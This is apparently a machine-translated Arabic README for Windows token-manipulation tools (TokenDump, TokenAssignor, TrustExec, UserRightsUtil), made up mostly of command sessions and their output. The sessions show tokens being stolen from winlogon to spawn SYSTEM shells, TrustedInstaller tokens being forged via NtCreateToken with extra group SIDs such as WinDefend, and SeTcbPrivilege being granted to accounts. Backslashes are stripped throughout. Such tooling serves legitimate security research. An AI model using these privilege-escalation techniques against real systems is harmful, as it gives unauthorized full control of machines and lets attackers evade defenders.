Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEMSDTC EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEMSDTC GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000070
Value[0x01] : 0x000000000007DF18
[*] Done.
للتحقيق في الرمز المميز المنتحل الشخصية المطبقة على مؤشر الترابط ، قم بتعيين معرف مؤشر الترابط كخيار -t على النحو التالي:
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
C:Dev>.TokenDump.exe -s -p 3516 -t 4656 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for svchost.exe (PID: 3516, TID: 4656)]
Token User : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x0000000000038CC4
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x000000000002CE61
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeDebugPrivilege EnabledByDefault, Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEDiagTrack EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
==================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEDiagTrack GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000047
Value[0x01] : 0x000000000002C0FA
[*] Done.
العودة إلى الأعلى
مشروع
هذه الأداة هي معرفة كيفية تعيين الرمز المميز الأساسي:
PS C:Dev> .TokenAssignor.exe
TokenAssignor - Tool to execute token assigned process.
Usage: TokenAssignor.exe [Options]
-h, --help : Displays this help message.
-c, --command : Specifies a command to execute. Default is cmd.exe.
-m, --method : Specifies a method ID (0 - 3).
-p, --pid : Specifies a source PID for token stealing.
[!] -m option is required.
تحاول هذه الأداة سرقة الرمز المميز من عملية محددة وتنفيذ عملية مخصصة رمزية. معظم الأساليب تتطلب امتيازات إدارية. لتنفيذ عملية مخصصة رمزية مع CreateProcessAsUser API ، قم بتعيين خيار -m إلى 0 :
PS C:Dev> Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
270 13 2452 10108 0.33 688 1 winlogon
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 0
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
عند -m الخيار إلى 1 ، تحاول هذه الأداة إنشاء عملية مع وقف التنفيذ وتحديث الرمز المميز الأساسي إلى رمز مسرح. لا يمكن استخدام هذه الطريقة لتغيير معرف الجلسة بسبب تقييد النواة. معرف جلسة kernel من قوات الرمز المميز لمطابقة معرف الجلسة لـ _EPROCESS :
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 1
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:Windowssystem32cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJuser (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITYSYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
إذا تم تعيين خيار SET -m على 2 ، فإنه ينشئ عملية مميزة جديدة مع خدمة تسجيل الدخول الثانوية:
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 2
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
إذا تم تعيين خيار SET -m على 3 ، فإنه ينشئ عملية مميزة جديدة مخصصة مع طريقة خداع PPID:
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 3
[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
العودة إلى الأعلى
مشروع
تتمثل هذه الأداة في تنفيذ عملية NT SERVICETrustedInstaller Group. POC الأصلي هو Grzegorz TWOREK'S TRUSTEDINSTALLERCMD2.C. لقد قمت بنقلها إلى C# وأعيد بناؤها كأداة. تتطلب معظم العمليات امتيازًا إداريًا ( SeDebugPrivilege و SeImpersonatePrivilege والمستوى الإلزامي العالي):
PS C:Dev> .TrustExec.exe
TrustExec - Tool to create TrustedInstaller process.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account name or SID.
-n, --new-console : Flag to create new console. Use with -x flag.
-x, --exec : Flag to execute command.
-a, --account : Specifies account name to lookup.
-c, --command : Specifies command to execute. Default is cmd.exe.
-e, --extra : Specifies command to execute. Default is cmd.exe.
-m, --method : Specifies method ID. Default is 0 (NtCreateToken method).
-s, --sid : Specifies SID to lookup.
Available Method IDs:
+ 0 - Leverages NtCreateToken syscall.
+ 1 - Leverages virtual logon.
+ 2 - Leverages service logon.
+ 3 - Leverages S4U logon.
+ 4 - Leverages TrustedInstaller service.
لهذه الوحدة ، يتم تنفيذ تقنيات 2. يمكننا تحديد طريقة مع -m خيار. يمكن أن تكون قيمة خيار -m عددًا صحيحًا من 0 إلى 4 . على سبيل المثال ، إذا قمت بتعيين خيار -m على 0 ، فإن هذه الأداة تحاول الحصول على رمز TrustedInstaller مع NtCreateToken :
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
إذا كنت ترغب في إنشاء عملية باستخدام وحدة تحكم جديدة ، فقم بتعيين -n العلم على النحو التالي:
PS C:Dev> .TrustExec.exe -m 1 -x -c powershell -n
[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomainVirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.
كل طريقة أخرى غير طريقة خدمة TrustedInstaller (ID for -m هو 4 ) قبول SIDs مجموعة إضافية مع خيار -e . يجب أن يكون تنسيق القيمة لخيار -e SDDL SID. بالنسبة لفاصل SID String ، يمكنك استخدام الفاصلة على النحو التالي:
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINBackup Operators Alias S-1-5-32-551 Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
NT SERVICEWinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group
لحل الحساب SID ، قم بتعيين -l وخيار -a مع اسم الحساب على النحو التالي:
PS C:Dev> .TrustExec.exe -l -a "nt servicewindefend"
[*] Account Name : NT SERVICEWinDefend
[*] Account SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
PS C:Dev> .TrustExec.exe -l -a users
[*] Account Name : BUILTINUsers
[*] Account SID : S-1-5-32-545
[*] Account Type : Alias
العودة إلى الأعلى
مشروع
هذه الأداة هي إدارة المستخدم بشكل صحيح بدون secpol.msc . تتطلب أوامر أخرى غير lookup امتيازات المسؤول:
C:dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
لتعداد حقوق المستخدم لحساب معين ، استخدم أمر enum مع -u و د خيار Opitons أو -s على النحو التالي:
C:dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
إذا لم تحدد اسم المجال مع خيار -d ، فاستخدم اسم الكمبيوتر المحلي كاسم مجال:
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
هذا الأمر هو العثور على المستخدمين الذين لديهم حق محدد. على سبيل المثال ، إذا كنت ترغب في العثور على المستخدمين لديهم SeDebugPrivilege ، فإن تنفيذها على النحو التالي:
C:dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTINAdministrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
لسرد القيمة المتاحة لخيار -r ، استخدم -l الخيار:
C:dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
هذا الأمر هو البحث عن حساب SID على النحو التالي:
C:dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSOdavid
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSODomain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
إذا لم تحدد اسم المجال مع خيار -d ، فاستخدم اسم الكمبيوتر المحلي كاسم مجال:
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
هذا الأمر هو منح أو إلغاء حقوق المستخدم لحساب مستخدم معين. لمنح المستخدم حق المستخدم ، حدد حق المستخدم كقيمة لخيار -g :
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
لإلغاء المستخدم بشكل صحيح ، حدد مستخدمًا كقوة لخيار -r :
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:de>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
لسرد القيمة المتاحة لخيار -g أو -r ، استخدم -l الخيار:
C:dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
العودة إلى الأعلى
العودة إلى الأعلى
شكرا لنصائحك حول برمجة امتداد Windbg:
شكرا لبحثك البارز:
شكرا لعينة سائق kernel الخاص بك:
